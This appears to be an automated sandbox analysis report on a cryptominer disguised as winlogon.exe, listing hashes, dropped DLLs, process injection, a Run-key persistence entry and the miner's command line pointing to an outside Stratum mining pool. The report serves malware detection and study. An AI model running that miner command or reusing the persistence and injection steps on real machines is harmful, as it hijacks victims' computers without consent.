670145b34ab8de90239590d0a76a6c8989fc586c051a5b84042a0dee029c49b7

Analysis

max time kernel
92s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
20-05-2022 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winlogon.exe
Size

5.5MB
MD5

59d3d2406da9ec9591a7f5064375603c
SHA1

a43f3d2ebfdf2700edec93c1aa3e8d7e529a0294
SHA256

a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d
SHA512

233c715a750e159deb27c1e0d57856d47f8e7ab118933749bf8167abe3f3611fc094bf53584e708e5b34b224435f71ffcf3c85b85f7a00aeb917968b4e5dfad5

Score

9^/10

miner persistence

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Executes dropped EXE 2 IoCs

Processes:

winlogon.exewinlogon.exe

pid process

4416 winlogon.exe
4660 winlogon.exe

Loads dropped DLL 12 IoCs

Processes:

winlogon.exewinlogon.exe

pid	process
4416	winlogon.exe
4660	winlogon.exe
4416	winlogon.exe
4660	winlogon.exe
4416	winlogon.exe
4660	winlogon.exe
4416	winlogon.exe
4660	winlogon.exe
4416	winlogon.exe
4660	winlogon.exe
4660	winlogon.exe
4416	winlogon.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

winlogon.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Admin\\AppData\\Roaming\\winlogon\\winlogonservice.exe\" "	winlogon.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	winlogon.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

winlogon.exe

description	pid	process	target process
PID 1392 set thread context of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 set thread context of 4660	1392	winlogon.exe	winlogon.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

winlogon.exe

pid process

1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe
1392 winlogon.exe

pid	process
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe
1392	winlogon.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

winlogon.exe

description	pid	process	target process
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4416	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe
PID 1392 wrote to memory of 4660	1392	winlogon.exe	winlogon.exe

C:\Users\Admin\AppData\Local\Temp\winlogon.exe
"C:\Users\Admin\AppData\Local\Temp\winlogon.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1392

C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4416

C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\winlogon\LIBEAY32.dll
Filesize
1.6MB

MD5
9462cb83718ccab3c744f0f5561a289d

SHA1
d716496ea6b6354e2cab9337e6b631603bba80e5

SHA256
f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a

SHA512
9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\OpenCL.dll
Filesize
56KB

MD5
c4f271897205db916f46ce88f910eb5b

SHA1
6223d0d1146c8c3624bdb0db7576c5e915ead8a7

SHA256
9ae4be443b4c1bca28f3f5722756ef12a8c480c73d55020b253264dce801b772

SHA512
cc2c64bb37c2ccfe675031ddc962165fa313970f1f6c9721b3eab7110efde2fd7ab56720c6c0b83f067c85bc446ded3701d8777f0adcae835e36d20ca58d7622

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\OpenCL.dll
Filesize
56KB

MD5
c4f271897205db916f46ce88f910eb5b

SHA1
6223d0d1146c8c3624bdb0db7576c5e915ead8a7

SHA256
9ae4be443b4c1bca28f3f5722756ef12a8c480c73d55020b253264dce801b772

SHA512
cc2c64bb37c2ccfe675031ddc962165fa313970f1f6c9721b3eab7110efde2fd7ab56720c6c0b83f067c85bc446ded3701d8777f0adcae835e36d20ca58d7622

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\SSLEAY32.dll
Filesize
356KB

MD5
5935940918fa77c777fcd0475149a217

SHA1
8795761c41b59e6352e0f24cb385f88076a08491

SHA256
ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467

SHA512
44c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dll
Filesize
525KB

MD5
48131a7c1cd5bce34da3eda489a81158

SHA1
9e9b021b245464c81620ec1af765198471b538c7

SHA256
a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6

SHA512
6ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dll
Filesize
525KB

MD5
48131a7c1cd5bce34da3eda489a81158

SHA1
9e9b021b245464c81620ec1af765198471b538c7

SHA256
a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6

SHA512
6ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dll
Filesize
525KB

MD5
48131a7c1cd5bce34da3eda489a81158

SHA1
9e9b021b245464c81620ec1af765198471b538c7

SHA256
a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6

SHA512
6ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dll
Filesize
1.6MB

MD5
9462cb83718ccab3c744f0f5561a289d

SHA1
d716496ea6b6354e2cab9337e6b631603bba80e5

SHA256
f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a

SHA512
9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dll
Filesize
1.6MB

MD5
9462cb83718ccab3c744f0f5561a289d

SHA1
d716496ea6b6354e2cab9337e6b631603bba80e5

SHA256
f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a

SHA512
9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dll
Filesize
1.6MB

MD5
9462cb83718ccab3c744f0f5561a289d

SHA1
d716496ea6b6354e2cab9337e6b631603bba80e5

SHA256
f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a

SHA512
9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dll
Filesize
1.6MB

MD5
9462cb83718ccab3c744f0f5561a289d

SHA1
d716496ea6b6354e2cab9337e6b631603bba80e5

SHA256
f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a

SHA512
9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libwinpthread-1.dll
Filesize
70KB

MD5
7a2008c80f306eed0b8152b584e8153c

SHA1
b25f02add9743fff215523ec4c935c5526522243

SHA256
dd04524dd4220a868c6e35183f6284bbf7cd1fa9273d85636239e0fc3ac245e4

SHA512
02f23b01954e53a3c2c2a4940150abe2b0952b3d2b00b7cc93bd179c59eaf39d11ff2dd53b5a9928a4dd0fe52afb6b8162d794c09c141e9e046b5a674f428c2c

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\libwinpthread-1.dll
Filesize
70KB

MD5
7a2008c80f306eed0b8152b584e8153c

SHA1
b25f02add9743fff215523ec4c935c5526522243

SHA256
dd04524dd4220a868c6e35183f6284bbf7cd1fa9273d85636239e0fc3ac245e4

SHA512
02f23b01954e53a3c2c2a4940150abe2b0952b3d2b00b7cc93bd179c59eaf39d11ff2dd53b5a9928a4dd0fe52afb6b8162d794c09c141e9e046b5a674f428c2c

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\ssleay32.dll
Filesize
356KB

MD5
5935940918fa77c777fcd0475149a217

SHA1
8795761c41b59e6352e0f24cb385f88076a08491

SHA256
ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467

SHA512
44c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\ssleay32.dll
Filesize
356KB

MD5
5935940918fa77c777fcd0475149a217

SHA1
8795761c41b59e6352e0f24cb385f88076a08491

SHA256
ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467

SHA512
44c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
Filesize
30KB

MD5
7257652bada64cfcfb81fc671b8b6c67

SHA1
c4db7ba1fa0ae7d9b558f25670a61f0d6144c420

SHA256
a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be

SHA512
c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
Filesize
30KB

MD5
7257652bada64cfcfb81fc671b8b6c67

SHA1
c4db7ba1fa0ae7d9b558f25670a61f0d6144c420

SHA256
a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be

SHA512
c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
Filesize
30KB

MD5
7257652bada64cfcfb81fc671b8b6c67

SHA1
c4db7ba1fa0ae7d9b558f25670a61f0d6144c420

SHA256
a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be

SHA512
c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dll
Filesize
83KB

MD5
15d6af5c659fe2d9524dd9a90a674d02

SHA1
33d2f481b71a82bf4051296957ff327e50bfb033

SHA256
aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c

SHA512
776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dll
Filesize
83KB

MD5
15d6af5c659fe2d9524dd9a90a674d02

SHA1
33d2f481b71a82bf4051296957ff327e50bfb033

SHA256
aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c

SHA512
776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377

Download Submit
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dll
Filesize
83KB

MD5
15d6af5c659fe2d9524dd9a90a674d02

SHA1
33d2f481b71a82bf4051296957ff327e50bfb033

SHA256
aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c

SHA512
776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377

Download Submit
memory/4416-146-0x0000000000400000-0x000000000051E000-memory.dmp

Filesize
1.1MB

Download
memory/4416-130-0x0000000000000000-mapping.dmp

Download
memory/4416-131-0x0000000000400000-0x000000000051E000-memory.dmp

Filesize
1.1MB

Download
memory/4416-159-0x0000000000400000-0x000000000051E000-memory.dmp

Filesize
1.1MB

Download
memory/4660-148-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/4660-133-0x0000000000000000-mapping.dmp

Download
memory/4660-134-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/4660-160-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download